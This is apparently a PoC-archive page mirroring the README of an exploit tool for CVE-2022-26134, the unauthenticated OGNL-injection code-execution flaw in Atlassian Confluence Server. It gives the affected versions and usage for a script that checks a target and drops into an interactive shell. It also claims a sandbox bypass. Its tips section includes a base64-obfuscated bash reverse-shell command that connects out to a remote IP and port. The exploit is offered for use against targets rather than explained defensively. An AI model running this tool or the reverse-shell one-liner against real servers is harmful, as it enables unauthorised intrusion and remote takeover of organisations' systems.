Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-26134 PoC — Atlassian Confluence Server 注入漏洞

Source
https://github.com/SNCKER/CVE-2022-26134
Associated Vulnerability
Title:Atlassian Confluence Server 注入漏洞 (CVE-2022-26134)
Description:In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
Description
[CVE-2022-26134]Confluence OGNL expression injected RCE with sandbox bypass.
Readme
# CVE-2022-26134
Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp

## Update
Add sandbox bypass, high version supported.

# Usage
```
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
```

The script will auto check target is vulnerable, and enter a pseudo-interactive shell if it's vulnerable.

Test under linux:  
![linux](https://raw.githubusercontent.com/SNCKER/CVE-2022-26134/master/linux.jpg)

Test under windows:  
![windows](https://raw.githubusercontent.com/SNCKER/CVE-2022-26134/master/windows.jpg)

Just input 'q' when you want to quit.

# Some tips
Command parameters are directly passed to the runtime.exec method, which does not have the context of the shell.  
so.  
Under Windows, some commands such as `dir` cannot be executed directly, you can use `cmd.exe /c dir`.  
Under linux, some special symbols cannot take effect, If you need to execute some command with special symbols like reverse shell, you can base64 encode it and then use `bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}`.
File Snapshot

 [4.0K]  /data/pocs/765ab453007f07a33e20fc305ff0d80f8d764dd3
├── [3.4K]  Confluence_cve_2022_26134_RCE.py
├── [ 34K]  linux.jpg
├── [1.1K]  README.md
└── [ 11K]  windows.jpg

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →